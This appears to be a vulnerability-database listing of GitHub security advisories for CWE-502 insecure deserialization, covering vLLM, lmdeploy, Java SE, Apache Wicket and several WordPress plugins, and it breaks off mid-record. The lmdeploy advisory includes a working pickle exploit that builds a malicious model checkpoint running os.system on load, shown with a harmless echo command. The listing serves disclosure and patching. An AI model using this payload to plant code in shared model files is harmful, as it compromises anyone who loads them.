CWE-502
AllowedDeserialization of Untrusted Data
Abstraction: Base · Status: Draft
The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid.
4798 vulnerabilities reference this CWE, most recent first.
GHSA-9PCC-GVX5-R5WM
Vulnerability from github – Published: 2025-05-06 16:38 – Updated: 2025-12-05 00:14Affected Environments
Note that this issue only affects the V0 engine, which has been off by default since v0.8.0. Further, the issue only applies to a deployment using tensor parallelism across multiple hosts, which we do not expect to be a common deployment pattern.
Since V0 is has been off by default since v0.8.0 and the fix is fairly invasive, we have decided not to fix this issue. Instead we recommend that users ensure their environment is on a secure network in case this pattern is in use.
The V1 engine is not affected by this issue.
Impact
In a multi-node vLLM deployment using the V0 engine, vLLM uses ZeroMQ for some multi-node communication purposes. The secondary vLLM hosts open a SUB ZeroMQ socket and connect to an XPUB socket on the primary vLLM host.
https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L295-L301
When data is received on this SUB socket, it is deserialized with pickle. This is unsafe, as it can be abused to execute code on a remote machine.
https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L468-L470
Since the vulnerability exists in a client that connects to the primary vLLM host, this vulnerability serves as an escalation point. If the primary vLLM host is compromised, this vulnerability could be used to compromise the rest of the hosts in the vLLM deployment.
Attackers could also use other means to exploit the vulnerability without requiring access to the primary vLLM host. One example would be the use of ARP cache poisoning to redirect traffic to a malicious endpoint used to deliver a payload with arbitrary code to execute on the target machine.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "vllm"
},
"ranges": [
{
"events": [
{
"introduced": "0.5.2"
},
{
"fixed": "0.10.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-30165"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": true,
"github_reviewed_at": "2025-05-06T16:38:35Z",
"nvd_published_at": "2025-05-06T17:16:11Z",
"severity": "HIGH"
},
"details": "### Affected Environments\n\nNote that this issue only affects the V0 engine, which has been off by default since v0.8.0. Further, the issue only applies to a deployment using tensor parallelism across multiple hosts, which we do not expect to be a common deployment pattern.\n\nSince V0 is has been off by default since v0.8.0 and the fix is fairly invasive, we have decided not to fix this issue. Instead we recommend that users ensure their environment is on a secure network in case this pattern is in use.\n\nThe V1 engine is not affected by this issue.\n\n### Impact\n\nIn a multi-node vLLM deployment using the V0 engine, vLLM uses ZeroMQ for some multi-node communication purposes. The secondary vLLM hosts open a `SUB` ZeroMQ socket and connect to an `XPUB` socket on the primary vLLM host.\n\nhttps://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L295-L301\n\nWhen data is received on this `SUB` socket, it is deserialized with `pickle`. This is unsafe, as it can be abused to execute code on a remote machine.\n\nhttps://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L468-L470\n\nSince the vulnerability exists in a client that connects to the primary vLLM host, this vulnerability serves as an escalation point. If the primary vLLM host is compromised, this vulnerability could be used to compromise the rest of the hosts in the vLLM deployment.\n\nAttackers could also use other means to exploit the vulnerability without requiring access to the primary vLLM host. One example would be the use of ARP cache poisoning to redirect traffic to a malicious endpoint used to deliver a payload with arbitrary code to execute on the target machine.",
"id": "GHSA-9pcc-gvx5-r5wm",
"modified": "2025-12-05T00:14:53Z",
"published": "2025-05-06T16:38:35Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-9pcc-gvx5-r5wm"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30165"
},
{
"type": "PACKAGE",
"url": "https://github.com/vllm-project/vllm"
},
{
"type": "WEB",
"url": "https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L295-L301"
},
{
"type": "WEB",
"url": "https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L468-L470"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Remote Code Execution Vulnerability in vLLM Multi-Node Cluster Configuration"
}
GHSA-9PF3-7RRR-X5JH
Vulnerability from github – Published: 2025-12-26 17:34 – Updated: 2025-12-27 01:08Summary
An insecure deserialization vulnerability exists in lmdeploy where torch.load() is called without the weights_only=True parameter when loading model checkpoint files. This allows an attacker to execute arbitrary code on the victim's machine when they load a malicious .bin or .pt model file.
CWE: CWE-502 - Deserialization of Untrusted Data
Details
Several locations in lmdeploy use torch.load() without the recommended weights_only=True security parameter. PyTorch's torch.load() uses Python's pickle module internally, which can execute arbitrary code during deserialization.
Vulnerable Locations
1. lmdeploy/vl/model/utils.py (Line 22)
def load_weight_ckpt(ckpt: str) -> Dict[str, torch.Tensor]:
"""Load checkpoint."""
if ckpt.endswith('.safetensors'):
return load_file(ckpt) # Safe - uses safetensors
else:
return torch.load(ckpt) # ← VULNERABLE: no weights_only=True
2. lmdeploy/turbomind/deploy/loader.py (Line 122)
class PytorchLoader(BaseLoader):
def items(self):
params = defaultdict(dict)
for shard in self.shards:
misc = {}
tmp = torch.load(shard, map_location='cpu') # ← VULNERABLE
Additional vulnerable locations:
- lmdeploy/lite/apis/kv_qparams.py:129-130
- lmdeploy/lite/apis/smooth_quant.py:61
- lmdeploy/lite/apis/auto_awq.py:101
- lmdeploy/lite/apis/get_small_sharded_hf.py:41
Note: Secure Pattern Already Exists
The codebase already uses the secure pattern in one location:
# lmdeploy/pytorch/weight_loader/model_weight_loader.py:103
state = torch.load(file, weights_only=True, map_location='cpu') # ✓ Secure
This shows the fix is already known and can be applied consistently across the codebase.
PoC
Step 1: Create a Malicious Checkpoint File
Save this as create_malicious_checkpoint.py:
#!/usr/bin/env python3
"""
Creates a malicious PyTorch checkpoint that executes code when loaded.
"""
import pickle
import os
class MaliciousPayload:
"""Executes arbitrary code during pickle deserialization."""
def __init__(self, command):
self.command = command
def __reduce__(self):
# This is called during unpickling - returns (callable, args)
return (os.system, (self.command,))
def create_malicious_checkpoint(output_path, command):
"""Create a malicious checkpoint file."""
malicious_state_dict = {
'model.layer.weight': MaliciousPayload(command),
'config': {'hidden_size': 768}
}
with open(output_path, 'wb') as f:
pickle.dump(malicious_state_dict, f)
print(f"[+] Created malicious checkpoint: {output_path}")
if __name__ == "__main__":
os.makedirs("malicious_model", exist_ok=True)
create_malicious_checkpoint(
"malicious_model/pytorch_model.bin",
"echo '[PoC] Arbitrary code executed! - RCE confirmed'"
)
Step 2: Load the Malicious File (Simulates lmdeploy's Behavior)
Save this as exploit.py:
#!/usr/bin/env python3
"""
Demonstrates the vulnerability by loading the malicious checkpoint.
This simulates what happens when lmdeploy loads an untrusted model.
"""
import pickle
def unsafe_load(path):
"""Simulates torch.load() without weights_only=True."""
# torch.load() uses pickle internally, so this is equivalent
with open(path, 'rb') as f:
return pickle.load(f)
if __name__ == "__main__":
print("[*] Loading malicious checkpoint...")
print("[*] This simulates: torch.load(ckpt) in lmdeploy")
print("-" * 50)
result = unsafe_load("malicious_model/pytorch_model.bin")
print("-" * 50)
print(f"[!] Checkpoint loaded. Keys: {list(result.keys())}")
print("[!] If you see the PoC message above, RCE is confirmed!")
Step 3: Run the PoC
# Create the malicious checkpoint
python create_malicious_checkpoint.py
# Exploit - triggers code execution
python exploit.py
Expected Output
[+] Created malicious checkpoint: malicious_model/pytorch_model.bin
[*] Loading malicious checkpoint...
[*] This simulates: torch.load(ckpt) in lmdeploy
--------------------------------------------------
[PoC] Arbitrary code executed! - RCE confirmed ← Code executed here!
--------------------------------------------------
[!] Checkpoint loaded. Keys: ['model.layer.weight', 'config']
[!] If you see the PoC message above, RCE is confirmed!
The [PoC] Arbitrary code executed! message proves that arbitrary shell commands run during deserialization.
Impact
Who Is Affected?
- All users who load PyTorch model files (
.bin,.pt) from untrusted sources - This includes models downloaded from HuggingFace, ModelScope, or shared by third parties
Attack Scenario
- Attacker creates a malicious model file (e.g.,
pytorch_model.bin) containing a pickle payload - Attacker distributes it as a "fine-tuned model" on model sharing platforms or directly to victims
- Victim downloads and loads the model using lmdeploy
- Malicious code executes with the victim's privileges
Potential Consequences
- Remote Code Execution (RCE) - Full system compromise
- Data theft - Access to sensitive files, credentials, API keys
- Lateral movement - Pivot to other systems in cloud environments
- Cryptomining or ransomware - Malware deployment
Recommended Fix
Add weights_only=True to all torch.load() calls:
# lmdeploy/vl/model/utils.py:22
- return torch.load(ckpt)
+ return torch.load(ckpt, weights_only=True)
# lmdeploy/turbomind/deploy/loader.py:122
- tmp = torch.load(shard, map_location='cpu')
+ tmp = torch.load(shard, map_location='cpu', weights_only=True)
# Apply the same pattern to:
# - lmdeploy/lite/apis/kv_qparams.py:129-130
# - lmdeploy/lite/apis/smooth_quant.py:61
# - lmdeploy/lite/apis/auto_awq.py:101
# - lmdeploy/lite/apis/get_small_sharded_hf.py:41
Alternatively, consider migrating fully to SafeTensors format, which is already supported in the codebase and immune to this vulnerability class.
Resources
Official PyTorch Security Documentation
"torch.load() uses pickle module implicitly, which is known to be insecure. It is possible to construct malicious pickle data which will execute arbitrary code during unpickling. Never load data that could have come from an untrusted source."
Related CVEs
| CVE | Description | CVSS |
|---|---|---|
| CVE-2025-32434 | PyTorch torch.load() RCE vulnerability |
9.3 Critical |
| CVE-2024-5452 | PyTorch Lightning insecure deserialization | 8.8 High |
Additional Resources
- CWE-502: Deserialization of Untrusted Data
- Trail of Bits: Exploiting ML Pickle Files
- Rapid7: Attackers Weaponizing AI Models
Thank you for your time reviewing this report. I'm happy to provide any additional information or help with testing the fix. Please let me know if you have any questions!
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.11"
},
"package": {
"ecosystem": "PyPI",
"name": "lmdeploy"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.11.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-67729"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-26T17:34:08Z",
"nvd_published_at": "2025-12-26T22:15:52Z",
"severity": "HIGH"
},
"details": "## Summary\n\nAn insecure deserialization vulnerability exists in lmdeploy where `torch.load()` is called without the `weights_only=True` parameter when loading model checkpoint files. This allows an attacker to execute arbitrary code on the victim\u0027s machine when they load a malicious `.bin` or `.pt` model file.\n\n\n**CWE:** CWE-502 - Deserialization of Untrusted Data\n\n---\n\n## Details\n\nSeveral locations in lmdeploy use `torch.load()` without the recommended `weights_only=True` security parameter. PyTorch\u0027s `torch.load()` uses Python\u0027s pickle module internally, which can execute arbitrary code during deserialization.\n\n### Vulnerable Locations\n\n**1. `lmdeploy/vl/model/utils.py` (Line 22)**\n\n```python\ndef load_weight_ckpt(ckpt: str) -\u003e Dict[str, torch.Tensor]:\n \"\"\"Load checkpoint.\"\"\"\n if ckpt.endswith(\u0027.safetensors\u0027):\n return load_file(ckpt) # Safe - uses safetensors\n else:\n return torch.load(ckpt) # \u2190 VULNERABLE: no weights_only=True\n```\n\n**2. `lmdeploy/turbomind/deploy/loader.py` (Line 122)**\n\n```python\nclass PytorchLoader(BaseLoader):\n def items(self):\n params = defaultdict(dict)\n for shard in self.shards:\n misc = {}\n tmp = torch.load(shard, map_location=\u0027cpu\u0027) # \u2190 VULNERABLE\n```\n\n**Additional vulnerable locations:**\n- `lmdeploy/lite/apis/kv_qparams.py:129-130`\n- `lmdeploy/lite/apis/smooth_quant.py:61`\n- `lmdeploy/lite/apis/auto_awq.py:101`\n- `lmdeploy/lite/apis/get_small_sharded_hf.py:41`\n\n### Note: Secure Pattern Already Exists\n\nThe codebase already uses the secure pattern in one location:\n\n```python\n# lmdeploy/pytorch/weight_loader/model_weight_loader.py:103\nstate = torch.load(file, weights_only=True, map_location=\u0027cpu\u0027) # \u2713 Secure\n```\n\nThis shows the fix is already known and can be applied consistently across the codebase.\n\n---\n\n## PoC\n\n### Step 1: Create a Malicious Checkpoint File\n\nSave this as `create_malicious_checkpoint.py`:\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nCreates a malicious PyTorch checkpoint that executes code when loaded.\n\"\"\"\nimport pickle\nimport os\n\nclass MaliciousPayload:\n \"\"\"Executes arbitrary code during pickle deserialization.\"\"\"\n \n def __init__(self, command):\n self.command = command\n \n def __reduce__(self):\n # This is called during unpickling - returns (callable, args)\n return (os.system, (self.command,))\n\ndef create_malicious_checkpoint(output_path, command):\n \"\"\"Create a malicious checkpoint file.\"\"\"\n malicious_state_dict = {\n \u0027model.layer.weight\u0027: MaliciousPayload(command),\n \u0027config\u0027: {\u0027hidden_size\u0027: 768}\n }\n \n with open(output_path, \u0027wb\u0027) as f:\n pickle.dump(malicious_state_dict, f)\n \n print(f\"[+] Created malicious checkpoint: {output_path}\")\n\nif __name__ == \"__main__\":\n os.makedirs(\"malicious_model\", exist_ok=True)\n create_malicious_checkpoint(\n \"malicious_model/pytorch_model.bin\",\n \"echo \u0027[PoC] Arbitrary code executed! - RCE confirmed\u0027\"\n )\n```\n\n### Step 2: Load the Malicious File (Simulates lmdeploy\u0027s Behavior)\n\nSave this as `exploit.py`:\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nDemonstrates the vulnerability by loading the malicious checkpoint.\nThis simulates what happens when lmdeploy loads an untrusted model.\n\"\"\"\nimport pickle\n\ndef unsafe_load(path):\n \"\"\"Simulates torch.load() without weights_only=True.\"\"\"\n # torch.load() uses pickle internally, so this is equivalent\n with open(path, \u0027rb\u0027) as f:\n return pickle.load(f)\n\nif __name__ == \"__main__\":\n print(\"[*] Loading malicious checkpoint...\")\n print(\"[*] This simulates: torch.load(ckpt) in lmdeploy\")\n print(\"-\" * 50)\n \n result = unsafe_load(\"malicious_model/pytorch_model.bin\")\n \n print(\"-\" * 50)\n print(f\"[!] Checkpoint loaded. Keys: {list(result.keys())}\")\n print(\"[!] If you see the PoC message above, RCE is confirmed!\")\n```\n\n### Step 3: Run the PoC\n\n```bash\n# Create the malicious checkpoint\npython create_malicious_checkpoint.py\n\n# Exploit - triggers code execution\npython exploit.py\n```\n\n### Expected Output\n\n```\n[+] Created malicious checkpoint: malicious_model/pytorch_model.bin\n[*] Loading malicious checkpoint...\n[*] This simulates: torch.load(ckpt) in lmdeploy\n--------------------------------------------------\n[PoC] Arbitrary code executed! - RCE confirmed \u2190 Code executed here!\n--------------------------------------------------\n[!] Checkpoint loaded. Keys: [\u0027model.layer.weight\u0027, \u0027config\u0027]\n[!] If you see the PoC message above, RCE is confirmed!\n```\n\nThe `[PoC] Arbitrary code executed!` message proves that arbitrary shell commands run during deserialization.\n\n---\n\n## Impact\n\n### Who Is Affected?\n\n- **All users** who load PyTorch model files (`.bin`, `.pt`) from untrusted sources\n- This includes models downloaded from HuggingFace, ModelScope, or shared by third parties\n\n### Attack Scenario\n\n1. Attacker creates a malicious model file (e.g., `pytorch_model.bin`) containing a pickle payload\n2. Attacker distributes it as a \"fine-tuned model\" on model sharing platforms or directly to victims\n3. Victim downloads and loads the model using lmdeploy\n4. Malicious code executes with the victim\u0027s privileges\n\n### Potential Consequences\n\n- **Remote Code Execution (RCE)** - Full system compromise\n- **Data theft** - Access to sensitive files, credentials, API keys\n- **Lateral movement** - Pivot to other systems in cloud environments\n- **Cryptomining or ransomware** - Malware deployment\n\n---\n\n## Recommended Fix\n\nAdd `weights_only=True` to all `torch.load()` calls:\n\n```diff\n# lmdeploy/vl/model/utils.py:22\n- return torch.load(ckpt)\n+ return torch.load(ckpt, weights_only=True)\n\n# lmdeploy/turbomind/deploy/loader.py:122\n- tmp = torch.load(shard, map_location=\u0027cpu\u0027)\n+ tmp = torch.load(shard, map_location=\u0027cpu\u0027, weights_only=True)\n\n# Apply the same pattern to:\n# - lmdeploy/lite/apis/kv_qparams.py:129-130\n# - lmdeploy/lite/apis/smooth_quant.py:61\n# - lmdeploy/lite/apis/auto_awq.py:101\n# - lmdeploy/lite/apis/get_small_sharded_hf.py:41\n```\n\nAlternatively, consider migrating fully to SafeTensors format, which is already supported in the codebase and immune to this vulnerability class.\n\n---\n\n## Resources\n\n### Official PyTorch Security Documentation\n\n- **[PyTorch torch.load() Documentation](https://pytorch.org/docs/stable/generated/torch.load.html)**\n \n \u003e *\"torch.load() uses pickle module implicitly, which is known to be insecure. It is possible to construct malicious pickle data which will execute arbitrary code during unpickling. Never load data that could have come from an untrusted source.\"*\n\n### Related CVEs\n\n| CVE | Description | CVSS |\n|-----|-------------|------|\n| [CVE-2025-32434](https://nvd.nist.gov/vuln/detail/CVE-2025-32434) | PyTorch `torch.load()` RCE vulnerability | **9.3 Critical** |\n| [CVE-2024-5452](https://nvd.nist.gov/vuln/detail/CVE-2024-5452) | PyTorch Lightning insecure deserialization | **8.8 High** |\n\n### Additional Resources\n\n- [CWE-502: Deserialization of Untrusted Data](https://cwe.mitre.org/data/definitions/502.html)\n- [Trail of Bits: Exploiting ML Pickle Files](https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/)\n- [Rapid7: Attackers Weaponizing AI Models](https://www.rapid7.com/blog/post/2024/02/06/attackers-are-weaponizing-ai-model-files/)\n\n---\n\nThank you for your time reviewing this report. I\u0027m happy to provide any additional information or help with testing the fix. Please let me know if you have any questions!",
"id": "GHSA-9pf3-7rrr-x5jh",
"modified": "2025-12-27T01:08:38Z",
"published": "2025-12-26T17:34:08Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/InternLM/lmdeploy/security/advisories/GHSA-9pf3-7rrr-x5jh"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67729"
},
{
"type": "WEB",
"url": "https://github.com/InternLM/lmdeploy/commit/eb04b4281c5784a5cff5ea639c8f96b33b3ae5ee"
},
{
"type": "PACKAGE",
"url": "https://github.com/InternLM/lmdeploy"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "lmdeploy vulnerable to Arbitrary Code Execution via Insecure Deserialization in torch.load()"
}
GHSA-9PM6-22W2-X4H9
Vulnerability from github – Published: 2025-05-19 03:30 – Updated: 2025-05-19 03:30A vulnerability was found in iop-apl-uw basestation3 up to 3.0.4 and classified as problematic. This issue affects the function load_qc_pickl of the file basestation3/QC.py. The manipulation of the argument qc_file leads to deserialization. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The code maintainer tagged the issue as closed. But there is no new commit nor release in the GitHub repository available so far.
{
"affected": [],
"aliases": [
"CVE-2025-4905"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-05-19T02:15:17Z",
"severity": "MODERATE"
},
"details": "A vulnerability was found in iop-apl-uw basestation3 up to 3.0.4 and classified as problematic. This issue affects the function load_qc_pickl of the file basestation3/QC.py. The manipulation of the argument qc_file leads to deserialization. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The code maintainer tagged the issue as closed. But there is no new commit nor release in the GitHub repository available so far.",
"id": "GHSA-9pm6-22w2-x4h9",
"modified": "2025-05-19T03:30:30Z",
"published": "2025-05-19T03:30:30Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-4905"
},
{
"type": "WEB",
"url": "https://github.com/iop-apl-uw/basestation3/issues/6"
},
{
"type": "WEB",
"url": "https://github.com/iop-apl-uw/basestation3/issues/6#event-17672013757"
},
{
"type": "WEB",
"url": "https://github.com/iop-apl-uw/basestation3/issues/6#issue-3066055868"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.309461"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.309461"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.578074"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-9PPP-7G47-4H53
Vulnerability from github – Published: 2026-05-02 06:30 – Updated: 2026-05-02 06:30The Profile Builder Pro plugin for WordPress is vulnerable to PHP Object Injection in all versions up to and including 3.14.5. This is due to the use of PHP's maybe_unserialize() function on the attacker-controlled 'args' POST parameter within the wppb_request_users_pins_action_callback() AJAX handler, which lacked any nonce verification, type checking, or input validation before deserialization. Because the handler was registered with both wp_ajax_ and wp_ajax_nopriv_ hooks, it was reachable by completely unauthenticated users. This makes it possible for unauthenticated attackers to inject arbitrary PHP objects into application memory.
{
"affected": [],
"aliases": [
"CVE-2026-7647"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-05-02T06:16:04Z",
"severity": "HIGH"
},
"details": "The Profile Builder Pro plugin for WordPress is vulnerable to PHP Object Injection in all versions up to and including 3.14.5. This is due to the use of PHP\u0027s maybe_unserialize() function on the attacker-controlled \u0027args\u0027 POST parameter within the wppb_request_users_pins_action_callback() AJAX handler, which lacked any nonce verification, type checking, or input validation before deserialization. Because the handler was registered with both wp_ajax_ and wp_ajax_nopriv_ hooks, it was reachable by completely unauthenticated users. This makes it possible for unauthenticated attackers to inject arbitrary PHP objects into application memory.",
"id": "GHSA-9ppp-7g47-4h53",
"modified": "2026-05-02T06:30:24Z",
"published": "2026-05-02T06:30:24Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-7647"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/profile-builder-pro/tags/3.14.5/add-ons/user-listing/one-map-listing.php#L13"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/profile-builder-pro/tags/3.14.5/add-ons/user-listing/one-map-listing.php#L271"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/profile-builder-pro/trunk/add-ons/user-listing/one-map-listing.php#L13"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/profile-builder-pro/trunk/add-ons/user-listing/one-map-listing.php#L271"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c7b897f5-f988-4515-83bc-456f041d7e2e?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-9Q47-JM86-2C5R
Vulnerability from github – Published: 2022-05-24 17:14 – Updated: 2022-05-24 17:14Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
{
"affected": [],
"aliases": [
"CVE-2020-2756"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-04-15T14:15:00Z",
"severity": "MODERATE"
},
"details": "Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).",
"id": "GHSA-9q47-jm86-2c5r",
"modified": "2022-05-24T17:14:49Z",
"published": "2022-05-24T17:14:49Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-2756"
},
{
"type": "WEB",
"url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=SB10332"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2020/04/msg00024.html"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CKAV6KFFAEANXAN73AFTGU7Z6YNRWCXQ"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L7VHC4EW36KZEIDQ56RPCWBZCQELFFKN"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NYHHHZRHXCBGRHGE5UP7UEB4IZ2QX536"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/202006-22"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/202209-15"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20200416-0004"
},
{
"type": "WEB",
"url": "https://usn.ubuntu.com/4337-1"
},
{
"type": "WEB",
"url": "https://www.debian.org/security/2020/dsa-4662"
},
{
"type": "WEB",
"url": "https://www.debian.org/security/2020/dsa-4668"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00000.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00023.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00048.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-9Q62-9Q86-V696
Vulnerability from github – Published: 2022-05-14 01:05 – Updated: 2022-05-14 01:05The DiskFileItem class in Apache Wicket 6.x before 6.25.0 and 1.5.x before 1.5.17 allows remote attackers to cause a denial of service (infinite loop) and write to, move, and delete files with the permissions of DiskFileItem, and if running on a Java VM before 1.3.1, execute arbitrary code via a crafted serialized Java object.
{
"affected": [],
"aliases": [
"CVE-2016-6793"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-07-17T13:18:00Z",
"severity": "CRITICAL"
},
"details": "The DiskFileItem class in Apache Wicket 6.x before 6.25.0 and 1.5.x before 1.5.17 allows remote attackers to cause a denial of service (infinite loop) and write to, move, and delete files with the permissions of DiskFileItem, and if running on a Java VM before 1.3.1, execute arbitrary code via a crafted serialized Java object.",
"id": "GHSA-9q62-9q86-v696",
"modified": "2022-05-14T01:05:31Z",
"published": "2022-05-14T01:05:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-6793"
},
{
"type": "WEB",
"url": "https://wicket.apache.org/news/2016/12/31/cve-2016-6793.html"
},
{
"type": "WEB",
"url": "https://www.tenable.com/security/research/tra-2016-23"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2016/12/31/1"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/archive/1/539975/100/0/threaded"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/95168"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1037541"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-9QFQ-RW3C-8X7P
Vulnerability from github – Published: 2026-06-17 18:35 – Updated: 2026-06-17 18:35Unauthenticated PHP Object Injection in Zoya <= 1.4 versions.
{
"affected": [],
"aliases": [
"CVE-2026-40756"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-17T14:17:52Z",
"severity": "HIGH"
},
"details": "Unauthenticated PHP Object Injection in Zoya \u003c= 1.4 versions.",
"id": "GHSA-9qfq-rw3c-8x7p",
"modified": "2026-06-17T18:35:55Z",
"published": "2026-06-17T18:35:54Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40756"
},
{
